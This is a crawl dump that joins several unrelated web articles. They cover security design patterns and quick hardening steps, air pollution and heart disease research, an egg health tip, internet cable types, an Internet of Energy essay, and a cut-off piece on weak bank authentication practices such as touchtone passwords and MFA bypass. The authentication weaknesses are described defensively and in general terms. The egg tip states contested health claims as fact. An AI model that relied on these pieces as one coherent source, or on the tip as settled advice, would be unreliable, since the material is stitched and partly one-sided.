In the event of a failure or misconfiguration of an application or network device, would the result be a more, or less secure environment? That is, would the consequence result in a user performing a given operation unprotected; or a device passing unauthorized information?
· Failure of a system without proper error handling may result in a user gaining additional privileges or access.
· During a failure, improper (or complete lack of) fail-safe measures may result in a denial of service condition.
· The silent failure of a security measure (application monitoring tool, IDS, etc.) would prevent administrators from recognizing malicious or anomalous activity.
When processing input of any kind, if a problem is detected, fail safely and stop processing the request. Log (and optionally alarm) the incident. Failure to validate or continue could result in any number of unwanted conditions, including a crashed or compromised system, escalated privileges or a denial of service.
Configure systems such that they, by default, prevent all access. Then, selectively add privileges for users, hosts or protocols.
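A minimal illustration of that deny-all-then-allow stance (the host addresses are made-up examples):

```python
# Default-deny access check: nothing is permitted unless explicitly added.
ALLOWED_HOSTS = set()  # start empty: deny everything

def is_allowed(host):
    # Absence of a rule means "deny" -- never the other way around.
    return host in ALLOWED_HOSTS

assert not is_allowed("10.0.0.5")     # denied by default
ALLOWED_HOSTS.add("10.0.0.5")         # selectively grant access
assert is_allowed("10.0.0.5")
assert not is_allowed("192.168.1.9")  # everything else is still denied
```

The same shape applies whether the "hosts" are IP addresses, protocols, or user accounts: a misconfiguration that forgets to add an entry fails closed, not open.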
Design critical systems for high availability. This may include the following:
· Hot-swappable hardware (disk, cpu, memory),
· Redundant servers and network devices (email servers, routers, firewalls), and
· Clustered and fail-over applications (web, application and database servers)
· Employ the premise of “deny all” and only allow specific protocols, host or users
· Provide system lockouts on consecutive bad login attempts.
· If an application encounters an error while processing a transaction, trap and return the errors and exit cleanly.
· When dealing with sensitive information requiring encryption, if the encryption fails, return an error and ensure all temporary cleartext is securely wiped from disk and memory.
· Create a high-availability environment with redundant or failover components.
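The error-trapping bullets above can be sketched as a request handler that denies by default: the only path to approval is full, successful validation, and every error falls through to a logged refusal. The transaction fields and limits are invented for illustration:

```python
# Fail-securely request handler: any validation failure or unexpected
# exception is trapped, logged, and answered with a denial.
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("txn")

def process_transfer(request):
    try:
        amount = int(request["amount"])
        if amount <= 0 or amount > 10_000:
            raise ValueError("amount out of range")
        if not request.get("authenticated"):
            raise PermissionError("unauthenticated request")
        return "ALLOW"
    except Exception as exc:
        # Trap the error, log the incident, and exit cleanly with a denial.
        log.warning("transaction refused: %s", exc)
        return "DENY"

print(process_transfer({"amount": "250", "authenticated": True}))   # ALLOW
print(process_transfer({"amount": "-5", "authenticated": True}))    # DENY
print(process_transfer({"amount": "oops", "authenticated": True}))  # DENY
```

Note that a missing field, a parse error, and a policy violation all produce the same safe outcome; none of them lets the transaction continue with partial state or extra privileges.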
✓ System failures are logged and alarmed.
✓ A misconfiguration or software bug does not suddenly expose all resources.
✓ A single device or application failure does not lead to a denial of service.
✗ Extra cost and effort is required to support a redundant and fail-safe enterprise.
Low Hanging Fruit
New installations of operating systems, applications and hardware are rarely secure by default. Often, they are configured to be as “useable” as possible by enabling most or all services and defaulting to trivial or no authentication mechanisms. Lacking the most current patches, this all results in a very insecure configuration.
Under pressure to bring such a system into production, there may not be an opportunity to properly secure it. Since the risk of activation may be significant, however, something must still be done. Low hanging fruit are simple fixes that can be implemented quickly and will greatly improve the overall security.
Good security is a cycle that requires intelligent planning, careful implementation and meaningful testing. Unfortunately, administrators, developers and managers may not have the time or opportunity to properly complete this cycle. Therefore, taking advantage of the quick wins may be the only opportunity to establish reasonable security.
“Some security now is better than perfect security never.”
· Administrators or developers may not have the time to implement perfect security. That is, business or external forces may require that a system be made immediately accessible without undergoing proper hardening.
· The skills required to properly secure applications might not be immediately available.
· An adequate testing environment for new tools and procedures may not be available.
Do not attempt to redesign the environment or reinstall applications. At this stage, the goal is to apply basic steps that remove obvious vulnerabilities from the systems and environment (and build valuable awareness of them). Each fix, like the examples listed below, should be fairly simple to address and execute. The goal is to plug as many holes as possible, as quickly as possible.
· Patch the software. Patch the hardware.
· Prevent all but essential processes from running on startup.
· Log all network and application activity. Monitor these logs.
· Learn to recognize normal behavior and what may be malicious activity. Pay attention to the activity patterns in your environment (protocols, traffic profiles, most active/ least active users).
· Promote employee awareness programs, perhaps as a weekly security bulletin or message of the day.
· Change the default password when applications are first installed; you don’t need to make it undefeatable for now, just different than the default.
· Run applications as lesser-privileged users (in chroot jails, for example).
· Enable sufficient application error handling and data checking.
· Employ basic authentication on private web directories.
· Vendors will often recommend minimal configuration changes to their products to prevent trivial attacks against default installations. Be sure to follow them!
· Standardize installations of similar machines, with scripting or ghosting. Be sure to patch these source images.
· Remove expired user accounts.
· Remove or disable all unused or “temporary” access or authorization privileges.
· Configure centralized logging (aka a log server).
· Configure TCPWrappers to deny all but specific hosts, and log both failed and successful connections.
· Be aware of vulnerabilities by signing up for industry and vendor mailing lists.
· Replace cleartext protocols with secure alternatives (ssh, https, etc).
· In the absence of proper backup facilities, use tar and custom scripts to backup information.
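The improvised-backup idea in the last bullet can also be scripted portably with Python's standard library instead of shell tar; the directory contents below are a throwaway example:

```python
# Minimal tar-based backup using only the standard library.
import tarfile, tempfile, pathlib, time

def backup(source_dir, dest_dir):
    """Archive source_dir into a timestamped .tar.gz under dest_dir."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    archive = pathlib.Path(dest_dir) / f"backup-{stamp}.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(source_dir, arcname=pathlib.Path(source_dir).name)
    return archive

# Demonstration against throwaway temporary directories.
src = tempfile.mkdtemp()
(pathlib.Path(src) / "notes.txt").write_text("keep me safe")
dest = tempfile.mkdtemp()
made = backup(src, dest)
print(made.exists())  # True
```

A few lines like this, run from cron, are no substitute for proper backup facilities, but they fit the spirit of this pattern: some protection now rather than perfect protection never.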
✓ Some of the most effective security measures can be accomplished with these simple steps.
✓ Servers begin operation with an acceptable, minimum level of protection.
✓ Applications are not left exposed to trivial attacks and vulnerabilities.
✓ Basic troubleshooting and auditing trails are enabled.
Risk Assessment and Management
Alias: Other well-known names for the pattern, if any.
Motivation: A scenario that illustrates a design problem. The scenario will help you understand the more abstract description of the pattern that follows.
Problem: Describes the problem to be solved.
Forces: Forces determine why a problem is difficult. Describe the forces influencing the problem and solution.
Solution: The solution should solve the problem stated in the problem section. A good solution has enough detail so the designer knows what to do yet general enough to address a broad context.
Examples: Concrete examples that illustrate the application of the pattern.
Consequences: How does the pattern support its objectives?
Related Patterns: What design patterns are closely related to this one?
Architectural Patterns for Enabling Application Security, http://citeseer.nj.nec.com/yoder98architectural.html.
Gang of Four design patterns: The template for these patterns was adapted from the template used by the Gang of Four at http://www.hillside.net/patterns/Writing/GOFtempl.html
Pattern Checklist: A checklist for defining a pattern can be found at http://www.hillside.net/patterns/Writing/Check.html.
· Describes a single kind of problem.
· Describes the context in which the problem occurs.
· Describes the forces leading to the solution.
· Describes at least one actual instance of use.
· Describes or refers to other patterns that it relies upon.
Risk equation, Peter Tippett, executive publisher, Information Security magazine.
Bruce Schneier
“Security Manager Initiates Friendly Fire”, http://www.computerworld.com/cwi/story/0,1199,NAV47_STO59330,00.html
SP 800-27, “Engineering Principles for Information Technology Security (A Baseline for Achieving Security)”, June 2001, http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf
Sasha Romanosky is currently a Senior Security Engineer at a major financial institution and lives in San Francisco. He has a Bachelor of Science in Electrical and Computer Engineering from the University of Calgary, Canada and has been working with computer and Internet technologies for over 6 years. His passion is Internet security.
He can be reached at firstname.lastname@example.org. | <urn:uuid:85ed747a-7909-469a-9d2b-49a42ed7df8f> | CC-MAIN-2022-40 | https://www.cgisecurity.com/lib/securityDesignPatterns.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00688.warc.gz | en | 0.904448 | 7,495 | 2.65625 | 3 |
A new study soon to appear in the Journal of Public Health suggests that air pollution and living in apartment buildings may be associated with an increased risk for dangerous conditions like heart disease, stroke, and type 2 diabetes.
Cardiovascular diseases are a leading cause of death in developing countries.
Hypertension and metabolic syndrome are important causes of cardiovascular diseases.
Metabolic syndrome is further associated with abdominal obesity, elevated blood pressure, and higher blood glucose levels.
These conditions are associated with a higher risk for various health problems.
The causes of these disorders are complex and are related to genetic factors, lifestyle, diet, and environmental factors including traffic air pollution, traffic noise, residential housing, and neighborhood quality.
Researchers here investigated the associations between a long-term exposure to ambient air pollution and residential distance to green spaces and major roads with the development of hypertension and some components of metabolic syndrome.
These associations were assessed among people living in private houses or multi-story houses in Kaunas City, a city of 280,000 and the second largest city of Lithuania.
These components included: a high triglyceride level, reduced high-density lipoprotein cholesterol, higher blood glucose, and obesity.
The results indicate that air pollution levels above the median are associated with a higher risk of reduced high density lipoprotein.
Traffic-related exposure was associated with the incidence of hypertension, higher triglyceride level and reduced high-density lipoprotein cholesterol.
However, the negative impact of traffic air pollutants was observed only in the participants who lived in multifamily buildings.
Since there is more traffic near the multifamily apartment buildings, this may be associated with the incidence of hypertension as well.
In addition, a built-up environment, high residential density, street traffic and its configurations are further factors associated with social interactions and supportive relationships, which could also impact cardiovascular health.
The greenness, size, and type (activity) of the available open public spaces were observed to be inversely related to the risk factors assessed.
Investigators have additionally found positive effects of the natural environment, and have emphasized the positive impact of such spaces on cardiovascular health.
“Our research results enable us to say that we should regulate as much as possible the living space for one person in multifamily houses, improve the noise insulation of apartments, and promote the development of green spaces in multifamily houses,” said the study’s lead author, Agnė Brazienė.
Exposure to air pollution is the largest environmental health risk and ranks ninth among modifiable disease risk factors, above other common factors such as low physical activity, high cholesterol, and drug use (2). Most of the excess deaths attributable to air pollution exposure are due to acute ischemic/thrombotic cardiovascular events.
Air pollution may also be an important endocrine disrupter, contributing to the development of metabolic diseases such as obesity and diabetes mellitus (5).
While the developing world is most burdened by air pollution-associated health effects, the association between air pollution and mortality is still evident in developed countries where pollution levels are well below target standards (6, 7).
The purpose of this article is (1) to introduce the reader to the major studies that have established the link between particulate matter (PM) air pollution and human cardiovascular and metabolic disease and (2) to discuss the mechanisms by which PM mediates its biologic effects.
Air pollution is a complex mixture of gaseous and particulate components, each of which has detrimental effects on cardiovascular and respiratory systems.
The composition of air pollution varies greatly, depending on the source, emission rate, and sunlight and wind conditions. Gaseous components of air pollution include nitrogen dioxide (NO2), nitric oxide (NO), sulfur dioxide (SO2), ozone (O3), and carbon monoxide (CO) (2, 15, 16).
Particulate matter (PM) components of air pollution consist of carbonaceous particles with associated adsorbed organic chemicals and reactive metals. Common components of PM include nitrates, sulfates, polycyclic aromatic hydrocarbons, endotoxin, and metals such as iron, copper, nickel, zinc, and vanadium (2, 15, 17).
PM is subclassified according to particle size into (a) coarse (PM10, diameter <10μm), (b) fine (PM2.5, diameter <2.5μm), and (c) ultrafine (PM0.1, diameter <0.1μm). Coarse particles derive from numerous natural and industrial sources and generally do not penetrate beyond the upper bronchus. Fine and ultrafine particles are produced through the combustion of fossil fuels and represent a greater threat to health than coarse particles as they penetrate into the small airways and alveoli (16–19).
While the organic and metal components of particles vary with location, levels of PM2.5 have consistently correlated with negative cardiovascular outcomes regardless of location (15).
Epidemiological studies linking PM exposure to morbidity and mortality in humans
The association between high levels of PM air pollution and adverse health outcomes has been known since the first half of the twentieth century.
Smog incidents in Meuse Valley, Belgium (1930), Donora, Pennsylvania (1948), and London, UK (1952) acutely caused increased hospitalizations and deaths, particularly in the elderly and those with preexisting cardiac and respiratory diseases.
These incidents resulted in policy changes including the implementation of Clean Air Act in 1970 (22).
The reduction in PM levels have led to gradual reduction in PM-associated morbidity and mortality; however, recent epidemiologic studies still consistently show a link between PM exposure and cardiopulmonary mortality.
Short-term exposure studies
The increased deaths due to the smog in Meuse Valley, Donora, and London clearly suggested that acute exposure to air pollution is associated with adverse health outcomes. These classic cases of air pollution-induced mortality represent extreme examples, with the London smog reaching air PM concentrations of 4.5 mg/m3 (World Health Organization current safety guideline is 25 μg/m3) (21).
A recent meta-analysis of 110 peer-reviewed studies revealed that every 10 μg/m3 increase in PM2.5 concentration was associated with a 1.04% (95% CI 0.52%-1.56%) increase in all-cause mortality (10).
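As a rough illustration of how that coefficient is applied (a linear extrapolation for illustration only, not a figure from the study):

```python
# Toy calculation applying the meta-analysis coefficient:
# ~1.04% increase in all-cause mortality per 10 µg/m³ of PM2.5.
def excess_mortality_pct(delta_pm25_ug_m3, pct_per_10ug=1.04):
    """Linear approximation of excess mortality for a PM2.5 increase."""
    return pct_per_10ug * (delta_pm25_ug_m3 / 10.0)

print(excess_mortality_pct(10))  # 1.04
print(excess_mortality_pct(25))  # ≈ 2.6 (linear extrapolation only)
```

As discussed later in the article, the real concentration-response relationship is not linear at high concentrations, so a simple scaling like this only holds over modest exposure differences.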
Hospitalizations and mortality due to cardiovascular and respiratory illnesses were positively correlated with increases in PM2.5 concentrations.
Several large, multi-city studies have been conducted in both North America and Europe, the largest being the NMMAPS (National Morbidity, Mortality, and Air Pollution Study) (23–25) and APHEA (Air Pollution and Health: A European Approach) (26, 27) studies.
Findings from these studies were remarkably consistent and demonstrated that PM levels are significantly associated with daily all-cause, cardiovascular, and pulmonary mortality. Seasonal and regional variations existed in both studies possibly attributable to different sources of pollutants, meteorological conditions, and population differences.
For example, the APHEA study found a stronger effect of PM on daily mortality in cities with a larger contribution of traffic emissions to total PM.
This is in agreement with a recent study on triggers of myocardial infarction (MI) in which traffic exposure was found to be as significant of a trigger of MI as physical exertion and alcohol use (28).
The NMMAPS study also found that the relationship between PM exposure and mortality was independent of gaseous co-pollutants, including NO2, CO, and SO2.
Studies carried out in Asia and the developing world have generally shown smaller effects on daily mortality due to PM than studies from the United States and Europe. A recent meta-analysis of 85 studies from 12 low- and middle-income countries showed a 0.47% (95% CI 0.34-0.61) increase for cardiovascular mortality and a 0.57% (95% CI 0.28-0.86) increase for respiratory mortality for every 10 μg/m3 increase in PM2.5 concentration (14).
The cities covered by this analysis have mean PM2.5 levels ranging from 56 to 179 μg/m3, which is significantly higher than the mean PM2.5 levels in cities in the US and Europe.
The reduced concentration-response relationship between PM2.5 levels and mortality in these countries is likely due to the higher baseline PM level seen in these countries. Indeed, current evidence suggests that the concentration-response relationship between PM2.5 levels and mortality is biphasic (29–33).
A steep concentration-response function is observed at lower PM concentrations, while the curve flattens at higher concentrations.
A recent study from Beijing, China found that while the slope of the concentration-response curve flattened at higher PM concentrations, there was no saturation for increased risk of ischemic heart disease mortality, even at PM concentrations as high as 500 μg/m3 (33).
The biphasic relationship between PM concentration and adverse health outcomes means that the major health benefits from reducing PM levels will occur in countries with already cleaner air and that improvements in cardiovascular health will be more difficult to achieve in countries with higher levels of air pollution unless they can achieve a drastic improvement in PM concentrations.
The results of the NMMAPS and APHEA studies suggest that there is no “safe” threshold under which increases in PM are not associated with increased deaths.
Long-term exposure studies
In addition to studies on the acute effects of PM exposure, studies on the effect of chronic exposure to PM have revealed negative effects on long-term health outcomes.
The first of these was the Harvard Six Cities study, which prospectively measured the effect of air pollution on mortality in a cohort of 8,111 adults while controlling for individual risk factors, including smoking, body mass index, occupational exposures, hypertension, and diabetes (34).
The adjusted mortality rate ratio for the most polluted cities compared with the least polluted cities was 1.26 (95% CI 1.08-1.47). Air pollution, particularly PM2.5 and sulfates was positively associated with death from lung cancer and cardiopulmonary diseases.
Both PM2.5 and SO2 were positively correlated with all-cause, lung cancer, and cardiopulmonary mortality, and every 10 μg/m3 increase in PM2.5 was associated with a 4, 6 and 8% increased risk of all-cause, cardiopulmonary, and lung cancer mortality, respectively. Coarse particles and gaseous co-pollutants other than SO2 were not significantly related to mortality.
A study on 22 European cohorts within the multicenter European Study of Cohorts for Air Pollution Effects (ESCAPE) found an increased hazard ratio for all-cause mortality of 1.07 (95% CI 1.02-1.13) per 5 μg/m3 increase in PM2.5 (37).
Significant associations persisted even among participants exposed to PM2.5 levels below the European annual mean limit value of 25 μg/m3.
Overall, the evidence from both short-term and long-term exposure studies demonstrates a consistent association between increased air pollution exposure and mortality. While the magnitude of this effect is small, the ubiquity of air pollution exposure makes it a significant source of early mortality.
A global assessment of mortality attributable to several risk factors, including air pollution was carried out in the Global Burden of Diseases, Injuries, and Risk Factors Study 2015 (GBD 2015) (38).
This study estimated that PM2.5 is the fifth-ranking mortality risk factor, leading to 4.2 million deaths and 103.1 million disability-adjusted life-years in 2015. The largest number of deaths attributable to air pollution occurred in China with an estimated 1.11 million deaths.
These numbers are similar to the findings of a recent study from China that attributed 40.3% of deaths due to stroke, 26.8% of deaths due to ischemic heart disease, 23.9% of deaths due to lung cancer, and 18.7% of deaths due to chronic obstructive pulmonary disease (COPD) to PM2.5 exposure (39).
According to the GBD 2015 study, these represent the 1st, 2nd, 4th, and 5th leading causes of death in China, respectively (12).
Susceptibility to PM-induced morbidity and mortality
Enhanced risk of cardiovascular death from PM exposure has been linked to old age, low socioeconomic status, preexisting heart and lung disease, and smoking.
The APHENA (Air Pollution and Health: A Combined European and North American Approach) study, which analyzed data from the NMMAPS and APHEA studies found that the elderly and unemployed are at higher risk for the deleterious health effects associated with short-term exposure to PM (40).
The ACS study found that mortality from ischemic heart disease was positively correlated with chronic PM2.5 exposure among never smokers, former smokers, and current smokers (41). However, the risk for death due to arrhythmia, heart failure, and cardiac arrest was not elevated by PM2.5 for never smokers, but was significantly elevated for former and current smokers.
Studies have not shown a clear association between race and susceptibility to PM-induced health effects (42–44). However, air pollution in non-white neighborhoods tends to be higher than in majority-white areas, resulting in exposure disparities (45).
Finally, it has been suggested that women may be more susceptible than men to PM-induced health effects. In particular, robust risk estimates have been reported by studies that include only women.
The Women’s Health Initiative Observational Study found that every 10 μg/m3 increase in PM2.5 was associated with a 76% increase in fatal cardiovascular events, while the Nurses’ Health Study found that every 10 μg/m3 increase in PM10 was associated with a 43% increase in fatal coronary heart disease (48, 49).
More recent large studies have given conflicting results (42, 43). On a global scale, exposure disparities may play a role in increased risk for women as use of biomass fuels for cooking in sub-Saharan Africa and south Asia expose women to disproportionately high levels of indoor air pollution (50).
More information: “Association between the living environment and the risk of arterial hypertension and other components of metabolic syndrome,” Journal of Public Health (2019).
Journal information: Journal of Public Health
Provided by Oxford University Press | <urn:uuid:87cef442-22a3-4e66-9be6-a8cc3ac146a4> | CC-MAIN-2022-40 | https://debuglies.com/2019/06/25/air-pollution-is-associated-with-an-increased-risk-of-heart-disease-and-type-2-diabetes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00688.warc.gz | en | 0.941224 | 3,086 | 2.59375 | 3 |
Internet of Energy, digitalization and the circular economy
The pace of business model change—driven by digitalization—and the resulting disruption in many categories are challenging companies today. Digitalization, though, is only an enabler for the Internet of Energy and other upcoming technological trends, which will demand a radical change of economy.
The imperative of climate change and pollution mitigation in times where we expect population and individual demand to grow rapidly dictates optimized use of any available resource. The “circular economy” concept—which contrasts with today’s linear economy (take, make, use, dispose)—is useful here and more important now than ever before. And the Internet of Things, enabled by digitalization, will play a crucial role in making this concept work.
The circular economy concept requires that any resource is optimized in terms of renewability (energy used), reusability (cycling valuable metals, alloys and polymers beyond the shelf life of individual resources) and recyclability (compostable packaging). It is basically about optimizing the energy and natural resource ecosystems, and that can only happen by interconnecting the stakeholders of our infrastructure and our economy. No single player alone will be able to make a significant impact. The circular economy requires integrated information about demand and resource, and it requires the balance between the two to be optimized.
The backbone of this optimization will be the Internet of Things. It will allow assets to exchange data and, for example, machine learning algorithms to optimize demand dependent on priorities and available resource. It’s too soon to discuss the impact of that on our current industry silos—let alone individual companies. And while we use the term “disruption” so extensively already, the greatest levels of disruption are still to come!
Within the energy sector, the circular economy would be powered by an “Internet of Energy” shaped by the imperative of decarbonisation (supported by transitioning sectors that today rely heavily on fossil fuels, such as heat and transport, to electricity-based power). The Internet of Energy would feature distributed generation with a high share of renewable energy, empowered by storage in all forms (grid, behind-the-meter and electric vehicles), demand response supported by smart grid assets down to “white goods”—and a fully transparent cost and value structure that takes into account levelized cost of energy (LCoE), cost of externalities, time and location of generation, value of ancillary services and storage, opportunity cost, etc. I like to think of it as a “neuronal electricity network” in which generation and demand are optimized on result and empowered by machine learning algorithms. This would mean a total restructuring of the current energy ecosystem, where we could optimize operation at an entire system level without barriers.
A suitable setup for an Internet of Energy could be a centralized electricity system with large-scale renewables, storage and flexible backup power interconnected to a decentralized electricity system with distributed generation, combined heat and power, electric vehicles, smart white goods, etc. The Internet of Energy would ensure that all grid-connected assets (from nuclear power plants to coffee machines) can communicate and interact with one another, allowing for optimized generation and demand capacity management while honoring some hard settings (for instance, hospital operations theaters need power no matter what). It would require a good set of energy market rules as well to drive behavior while constantly adapting to user preferences and best performance.
But changes toward an Internet of Energy will not all happen simultaneously. First, we will see (and see already) IoT technology adopted to optimize current industry solutions and provide competitiveness among industry players. Practically all the leading OEMs in the energy space (and others) advertise their advancements and offerings in the IoT space already today.
Longer term, we will see how the competition between financial short-term interests of individual companies and common interest in long-term liveability of the planet pans out. But the current transformation of the oil and gas industry and the pledge of world leading companies to stick to the COP 21 climate change agreement, despite political disorientation in some parts of the world, allow for at least some cautious optimism. | <urn:uuid:8dc2d4d9-25ca-4dc7-8592-a6f8f4d3347a> | CC-MAIN-2022-40 | https://www.iotworldtoday.com/2017/08/31/internet-energy-digitalization-and-circular-economy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00688.warc.gz | en | 0.923513 | 849 | 2.84375 | 3 |
Eggs are among the most nutritious foods on the planet, containing a little bit of almost every nutrient you need.
High in cholesterol, but eating eggs does not adversely affect cholesterol in the blood for the majority of people.
Eating them consistently leads to elevated levels of HDL (the “good”) cholesterol, which is linked to a lower risk of many diseases.
Among the best dietary sources of choline, a nutrient that is incredibly important but most people aren’t getting enough of.
Egg consumption appears to change the pattern of LDL particles from small, dense LDL (bad) to large LDL, which is linked to a reduced heart disease risk.
The antioxidants lutein and zeaxanthin are very important for eye health and can help prevent macular degeneration and cataracts.
Omega-3 enriched and pastured eggs may contain significant amounts of omega-3 fatty acids. Eating these types of eggs is an effective way to reduce blood triglycerides.
For more tips, follow our today’s health tip listing. | <urn:uuid:d014e733-702d-4d4f-a8b9-cc8ebec943ac> | CC-MAIN-2022-40 | https://areflect.com/2019/09/25/todays-health-tip-benefits-of-eggs-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.945902 | 220 | 3.125 | 3 |
Most of us know the general distinction between ADSL, COAX and Fibre internet, but the cables behind these connections may be more of a mystery. The three most common types of communication cables are Twisted Pair, Coaxial, and Fibre Optic – understanding the difference of how data travels through each cable is what ultimately affects things like speed, latency, security, cost, etc. Here is a general breakdown of the three different types of cable and what they are capable of:
Twisted Pair Internet Cables:
Twisted pair cables are literally a pair of insulated wires that are twisted together. While this does help to reduce outside noise, these cables are still very susceptible to it. Twisted pair cables are the most cost-effective option of the three – mostly due to their lower bandwidth capacity and high attenuation. There are two types of twisted-pair cables:
Unshielded twisted pair (UTP)
- ‘Unshielded’ meaning it does not rely on physical shielding to block interference
- The most commonly used cable of the two, these are often used for both residential and business internet
- There are several UTP categories, which increase in bandwidth as you move up the scale, for example:
- CAT1 = up to 1Mbps | CAT2 = up to 4 Mbps | CAT5e = up to 1Gbps
Shielded twisted pair (STP)
- ‘Shielded’ with a foil jacket to cancel any outside interference
- Used primarily for large-scale enterprises, high-end applications, and exterior cabling that will be exposed to environmental elements.
Coaxial Internet Cables:
Coaxial cables are high-frequency transmission cables made up of a single solid copper core that transfers data electrically over the inner conductor. Coax has 80X more transmission capacity than twisted-pair cables.
This type of cable is commonly used to deliver TV signals (its higher bandwidth makes it more suitable for video applications) and to connect computers to a network or to the internet. Along with the stable transmission of data, coax also has anti-jamming capabilities and can effectively protect signals from being interfered with. The cost is slightly higher than twisted-pair cables, but still more economical than fibre. There are also two types of coaxial cables:
- Most commonly used to transmit video signals
- Often used to connect video signals between different components like DVDs, VCRs, or receivers commonly known as A/V cables
- Primarily utilized to transmit a data signal in a 2-way communication system
- Most commonly used for computer ethernet backbones, AM/FM radio receivers, GPS antenna, police scanners, and cell phone systems
Fibre Optic Internet Cables:
Fibre is the newest form of transmission cabling technology. Instead of transferring data over copper wires, these cables contain optical fibres that transmit data via light, rather than pulses of electricity. Each individual optical fibre is coated with plastic and contained in a protective tube. This makes fibre optic cables extremely resistant to external interference. The result is a super reliable, high-speed connection with 26,000X more transmission capacity than twisted-pair cables – but also a much higher cost. Again, there are two types of fibre cables:
- Has a small core and only allows one mode of light to propagate at a time
- Because of this, the number of light reflections decreases as they pass through the core
- The result is low attenuation and data that is able to travel further and faster
- Commonly used in telecom, CATV networks, and Universities.
- Has a larger core diameter that lets multiple modes of light propagate
- The number of light reflections increases as they travel through the core, which allows more data through
- Because of its high dispersion, multimode cables have lower bandwidth, higher attenuation and reduced signal quality further it travels
- Most commonly used for communication over short distances such as LAN, security systems, and general fibre networks.
Fibre networks can be shared or dedicated – make sure you’re choosing the right one for your needs.
Thinking back to grade school and the Goldilocks and the Three Bears analogy, all three types of internet cable offer something different. Dedicated Fibre might be too hot, but ADSL might be too cold. If you need help finding your “just right” solution, contact us – our team of experts is here to help. | <urn:uuid:abfe63d2-e099-4deb-8dcb-6b025ea72149> | CC-MAIN-2022-40 | https://itel.com/understanding-internet-cables/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.924131 | 937 | 3.46875 | 3 |
Despite assembling formidable armies of cybersecurity personnel armed with cutting-edge information security technologies, many financial institutions, healthcare facilities, and other organizations handling highly-sensitive information still utilize deficient authentication processes when interfacing with the public. While industry attention in recent years has been focused on multi-factor authentication (or the lack thereof), technological vulnerabilities, and social engineering attacks, there are several significant weaknesses in design that have not yet received adequate attention. I discuss several below with the hope that readers will take proper precautions, and that any organizations needing to implement modifications will do so; please note that all of these problems are real, and have been observed and/or tested in recent weeks:
1. Allowing people to authenticate over the phone by using ATM PIN numbers1
ATM PIN Numbers are acceptable as authentication at ATMs because the person using them to access an account must also present an ATM card – the card being something that the user physically possesses, and the PIN Number being something that the user alone knows, combining to create a basic form of multi-factor authentication. Of course, ATM PIN Numbers on their own are quite weak for authentication – typically consisting of only 4 numeric digits, and, often entered in public locations at times when others know they are being typed – but, as bank systems are typically programmed to lock accounts if a card is presented at an ATM or multiple ATMs and the wrong PIN is entered more than a few times, such security is often considered adequate; statistically speaking, the reasoning goes, someone who steals an ATM card is unlikely to be able to try enough PIN Number combinations to find a hit. (Related vulnerabilities are beyond the scope of this article.) However, the minute that people can authenticate over the phone using the same PIN Number – without presenting a physical ATM card – the level of security is dramatically reduced, as authentication relies on only a single, weak password. Locking an account after some number of incorrect attempts is also problematic in such a scenario – as such a policy would mean that anyone who knows a user’s login name and account number (which includes everyone who ever received a check from the user) can potentially lock that user out of ATMs simply by calling in multiple times and providing the wrong PIN Number. Of course, banks that allow users to authenticate with their PIN Numbers over the phone may be utilizing other forms of authentication that are invisible to the user – such as voiceprints, etc. – but, asking for a PIN Number absent the corresponding ATM card still raises questions.
2. Allowing people to enter passwords via telephone tones
Obtaining account information via a standard voice-based telephone call may have been quite common in the 1990s, but, today, various systems that still provide such legacy services undermine the security of users’ accounts by allowing passwords to be entered via the touchtones corresponding with letters on the standard telephone dialing pad. Because each number from 2-9 corresponds with 3 or 4 letters, and does not distinguish between upper and lower case characters, such a login system dramatically shrinks the universe of valid passwords, and effectively allows thousands of different passwords (instead of just 1) to work for an account. If one’s password is “josephS”, for example, only “josephS” should be accepted as valid; on a touchtone based login, however, entering “LORDsir” will also grant the user access; both appear identical to the authenticator, as they are both entered as “5673747.” Never mind the fact, that, on many phones, each key emits a different tone – passwords entered via touch tones can literally be recorded by anyone within an earshot or otherwise listening in to a call. The bottom line is that allowing people to enter passwords via telephone tones can dramatically weaken the security of any information protected by those passwords.
3. Allowing multi-factor authentication to be circumvented when users login from financial institutions
In order to facilitate inter-bank transfers, consolidated account reporting, and various other features that require financial institutions to communicate with one another, various systems that require multi-factor authentication when users login via the Internet do not require a second factor when another bank system logs in on behalf of a particular user. While such a policy in itself may be both acceptable and necessary in many cases, there have been situations observed in which the configuration information detailing from which systems user accounts can be accessed without a second factor is not kept up to date, or was configured overly broad to begin with; in at least one case, human users were able to circumvent a system’s second factor requirement simply by logging in from a particular network belonging to another financial institution.
4. Undermining strong authentication and other security technologies via “auto-reload” and other default-payment-source features
We have already seen real-world examples in which criminals were able to steal money from people’s bank accounts by hacking into systems unrelated to those accounts, but which users had configured to automatically pay for goods and/or services using the relevant accounts. If a criminal breaches a system that is set to reload a gift card account when the balance falls below a certain amount, for example, or to utilize a certain account by default for payments, the nefarious party may be able to effectively empty out the associated bank account by performing multiple reloads and or payments, without ever being subjected to the full scope of the bank’s authentication and anti-fraud measures.
5. Providing information about passwords after unsuccessful login attempts.
When someone attempting to gain access to a particular system enters an incorrect username+password combination, the system in question should not provide any information to that party other than communicating to him or her that the combination provided is not valid; yet, I have seen multiple systems, that, even in 2018, still provide the user with unnecessary details that can be exploited as part of attacks (e.g., the password is invalid (but not the username), the password contains illegal characters, etc.)
6. Providing information about prior passwords
